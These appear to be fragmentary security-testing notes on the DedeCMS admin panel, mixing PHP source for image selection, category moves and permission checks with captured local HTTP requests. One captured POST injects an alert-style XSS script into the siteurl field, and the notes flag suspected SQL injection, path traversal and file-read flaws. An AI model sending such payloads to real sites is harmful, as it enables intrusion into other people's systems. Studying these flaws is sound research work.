$tmp = preg_replace("#[\/][^\/]*$#i", "", $activepath);
$line = "\n<tr>
<td class='linerow' colspan='2'>
<a href='select_images.php?imgstick=$imgstick&v=$v&f=$f&activepath=".urlencode($tmp).$addparm."'><img src=img/dir2.gif border=0 width=16 height=16 align=absmiddle>上级目录</a></td>
<td colspan='2' class='linerow'> 当前目录:$activepath</td>
</tr>
";
echo $line;
}
else if(is_dir("$inpath/$file"))
{
if(preg_match("#^_(.*)$#i", $file)) continue; #屏蔽FrontPage扩展目录和linux隐蔽目录
if(preg_match("#^\.(.*)$#i", $file)) continue;
$line = "\n<tr>
<td bgcolor='#F9FBF0' class='linerow' colspan='2'>
<a href='select_images.php?imgstick=$imgstick&v=$v&f=$f&activepath=".urlencode("$activepath/$file").$addparm."'><img src=img/dir.gif border=0 width=16 height=16 align=absmiddle>$file</a></td>
<td class='linerow'> </td>
<td bgcolor='#F9FBF0' class='linerow'> </td>
</tr>";
echo "$line";
}
else if(preg_match("#\.(gif|png)#i", $file))
{
$reurl = "$activeurl/$file";
$reurl = preg_replace("#^\.\.#", "", $reurl);
if($cfg_remote_site=='Y' && $remoteuploads == 1)
{
$reurl = $remoteupUrl.$reurl;
}else{
$reurl = $reurl;
}
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$line = "\n<tr>
<td align='center' class='linerow' bgcolor='#F9FBF0'>
<a href=\"#\" onClick=\"ChangeImage('$reurl');\"><img src='img/picviewnone.gif' width='16' height='16' border='0' align=absmiddle></a>
</td>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=# onclick=\"ReturnImg('$reurl');\" $lstyle><img src=img/gif.gif border=0 width=16 height=16 align=absmiddle>$file</a></td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
}
else if(preg_match("#\.(jpg)#i", $file))
{
$reurl = "$activeurl/$file";
$reurl = preg_replace("#^\.\.#", "", $reurl);
if($cfg_remote_site=='Y' && $remoteuploads == 1)
{
$reurl = $remoteupUrl.$reurl;
}else{
$reurl = $reurl;
}
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$line = "\n<tr>
<td align='center' class='linerow' bgcolor='#F9FBF0'>
<a href=\"#\" onClick=\"ChangeImage('$reurl');\"><img src='img/picviewnone.gif' width='16' height='16' border='0' align=absmiddle></a>
</td>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=# onclick=\"ReturnImg('$reurl');\" $lstyle><img src=img/jpg.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
}
}//End Loop
$dh->close();
?>
<tr>
<td colspan='4' bgcolor='#E8F1DE'>
<table width='100%'>
<form action='select_images_post.php' method='POST' enctype="multipart/form-data" name='myform'>
<?php $noeditor = !empty($noeditor)?"<input type='hidden' name='noeditor' value='yes'>":''; echo $noeditor;//(2011.08.25 根据用户反馈修正图片上传回调 by:织梦的鱼)?>
<input type='hidden' name='activepath' value='<?php echo $activepath?>'>
<input type='hidden' name='f' value='<?php echo $f?>'>
<input type='hidden' name='v' value='<?php echo $v?>'>
<input type='hidden' name='imgstick' value='<?php echo $imgstick?>'>
<input type='hidden' name='CKEditorFuncNum' value='<?php echo isset($CKEditorFuncNum)? $CKEditorFuncNum : 1;?>'>
<input type='hidden' name='job' value='upload'>
<tr>
<td background="img/tbg.gif" bgcolor="#99CC00">
上 传: <input type='file' name='imgfile' style='width:250px'/>
<input type='checkbox' name='needwatermark' value='1' class='np' <?php if($photo_markup=='1') echo "checked"; ?> />水印
<input type='checkbox' name='resize' value='1' class='np' />缩小
宽:<input type='text' style='width:30' name='iwidth' value='<?php echo $cfg_ddimg_width?>' />
高:<input type='text' style='width:30' name='iheight' value='<?php echo $cfg_ddimg_height?>' />
<input type='submit' name='sb1' value='确定' />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>预览xss,路径穿越(无法验证)
POST /dede/catalog_edit.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_edit.php?id=12
Cookie: menuitems=2_1%2C3_1%2C1_1%2C4_1%2C5_1%2C6_1; lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=d5vr0ifoa9nfgvsupsok4nf77u; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1782046836; DedeLoginTime__ckMd5=9d80046da7b64ad6; _csrf_name_63248f8b=6ee0cca9afa3182fb42bbd894591c80f; _csrf_name_63248f8b__ckMd5=a9ebd761a18b4bd6
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
dopost=save&id=12&topid=0&issend=1&ishidden=0&channeltype=1&typename=%E7%9B%B8%E5%85%B3%E8%B5%84%E6%96%99&sortrank=0&corank=0&typedir=&isdefault=1&defaultname=index.html&ispart=0&cross=0&crossid=&moresite=0&siteurl=http%3A%2F%2F%3Cscript%3Ealert%28%27aaaqqqq%27%29%3C%2Fscript%3E&dfstyle=%7Bstyle%7D&tempindex=default%2Fadvancedsearch.htm&templist=20&temparticle=30&namerule=40&namerule2=50&seotitle=60&keywords=70&description=80&content=%26nbsp%3B%3Cimg+alt%3D%22%22+src%3D%22%2Fuploads%2F260621%2F1-260621004633557.png%22+style%3D%22width%3A+1918px%3B+height%3A+702px%3B%22+%2F%3E%3Cbr+type%3D%22_moz%22+%2F%3E%0D%0A&imageField.x=46&imageField.y=4
<img alt="" src="/uploads/260621/1-2606210046335
<?php
// 直接高亮显示当前目录下的 123.php,不会执行里面的任何函数或数据库操作
highlight_file('./123.php');
?>
搜索(sql,xss)
post反射xss成功
预览(任意文件读取,sql,路径遍历)
http://127.0.0.1:855/plus/list.php?tid=2271
移动栏目(逻辑漏洞,sql,空指针,xss?)
php
POST /dede/catalog_do.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_do.php?dopost=moveCatalog&typeid=12
Cookie: menuitems=2_1%2C3_1%2C4_1%2C5_1%2C6_1%2C1_1; lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=d5vr0ifoa9nfgvsupsok4nf77u; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1782046836; DedeLoginTime__ckMd5=9d80046da7b64ad6; _csrf=b07145643ffd6b99830f0ffaf9824bb5b9b9f811ac727f1b0bc443802f6cd4aba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%229Vk8aXT4RRnp206yee44oke4EAHXZv4L%22%3B%7D; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D2271; _csrf_name_63248f8b=9470a34b4d5a604c132d752b4629305a; _csrf_name_63248f8b__ckMd5=11560465b410a01b
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
dopost=moveCatalog&typeid=12&channelid=1&nextjob=unitok&movetype=65&imageField1.x=40&imageField1.y=14
php
else if($dopost == 'moveCatalog')
{
//检查权限
CheckPurview('t_Move');
require_once(DEDEINC.'/oxwindow.class.php');
require_once(DEDEINC.'/typelink.class.php');
require_once(DEDEINC.'/channelunit.func.php');
if(empty($nextjob))
{
$tl = new TypeLink($typeid);
$typename = $tl->TypeInfos['typename'];
$reid = $tl->TypeInfos['reid'];
$channelid = $tl->TypeInfos['channeltype'];
$typeOptions = $tl->GetOptionArray(0,0,$channelid);
$wintitle = "移动栏目";
$wecome_info = "<a href='catalog_main.php'>栏目管理</a> >> 移动栏目";
$win = new OxWindow();
$win->Init('catalog_do.php', 'js/blank.js', 'POST');
$win->AddHidden('dopost', 'moveCatalog');
$win->AddHidden('typeid', $typeid);
$win->AddHidden('channelid', $channelid);
$win->AddHidden('nextjob', 'unitok');
$win->AddTitle("移动目录时不会删除原来已创建的列表,移动后需重新对栏目创建HTML。");
$win->AddItem('你选择的栏目是:',"$typename($typeid)");
$win->AddItem('你希望移动到那个栏目?',"<select name='movetype'>\r\n<option value='0'>移动为顶级栏目</option>\r\n$typeOptions\r\n</select>");
$win->AddItem('注意事项:','不允许从父级移动到子级目录,只允许子级到更高级或同级或不同父级的情况。');
$winform = $win->GetWindow('ok');
$win->Display();
exit();
}
else
{
//dopost=moveCatalog&typeid=12&channelid=1&nextjob=unitok&movetype=65&imageField1.x=40&imageField1.y=14
//不可以一样
if($typeid==$movetype)
{
ShowMsg('移对对象和目标位置相同!', 'catalog_main.php');
exit();
}
//typeid=12&movetype=65
//移动,本来
if(IsParent($movetype, $typeid))
{
ShowMsg('不能从父类移动到子类!', 'catalog_main.php');
exit();
}
$dsql->ExecuteNoneQuery(" UPDATE `#@__arctype` SET reid='$movetype' WHERE id='$typeid' ");
UpDateCatCache();
ShowMsg('成功移动目录!', 'catalog_main.php');
exit();
}
}
php
/**
* 检测栏目是否是另一个栏目的父目录
*
* @access public
* @param string $sid 顶级目录id
* @param string $pid 下级目录id
* @return bool
*/
//
if ( ! function_exists('IsParent'))
{
//移动,本来
function IsParent($sid, $pid)
{
//移动
$pTypeArrays = GetParentIds($sid);
//存储
return in_array($pid, $pTypeArrays);
}
}
php
/**
* 获取上级ID列表
*
* @access public
* @param string $tid 栏目ID
* @return string
*/
if ( ! function_exists('GetParentIds'))
{
//移动
function GetParentIds($tid)
{
global $cfg_Cs;
//存储的父目录
$GLOBALS['pTypeArrays'][] = $tid;
//检查是否为空
if(!is_array($cfg_Cs))
{
require_once(DEDEDATA."/cache/inc_catalog_base.inc");
}
//isset() 只有在全部参数都已被设置时返回 true
//是空不存在栏目,父目录$cfg_Cs[$tid][0]==0
if(!isset($cfg_Cs[$tid]) || $cfg_Cs[$tid][0]==0)
{
//返回所有父目录
return $GLOBALS['pTypeArrays'];
}
else
{
//重新遍历
return GetParentIds($cfg_Cs[$tid][0]);
}
}
}
php
/**
* 对权限检测后返回操作对话框
*
* @access public
* @param string $n 功能名称
* @return string
*/
function CheckPurview($n)
{
if(!TestPurview($n))
{
ShowMsg("对不起,你没有权限执行此操作!<br/><br/><a href='javascript:history.go(-1);'>点击此返回上一页>></a>",'javascript:;');
exit();
}
}
php
/**
* 检验用户是否有权使用某功能,这个函数是一个回值函数
* CheckPurview函数只是对他回值的一个处理过程
*
* @access public
* @param string $n 功能名称
* @return mix 如果具有则返回TRUE
*/
function TestPurview($n)
{
$rs = FALSE;
$purview = $GLOBALS['cuserLogin']->getPurview();
if(preg_match('/admin_AllowAll/i',$purview))
{
return TRUE;
}
if($n=='')
{
return TRUE;
}
if(!isset($GLOBALS['groupRanks']))
{
$GLOBALS['groupRanks'] = explode(' ',$purview);
}
$ns = explode(',',$n);
foreach($ns as $n)
{
//只要找到一个匹配的权限,即可认为用户有权访问此页面
if($n=='')
{
continue;
}
if(in_array($n,$GLOBALS['groupRanks']))
{
$rs = TRUE; break;
}
}
return $rs;
}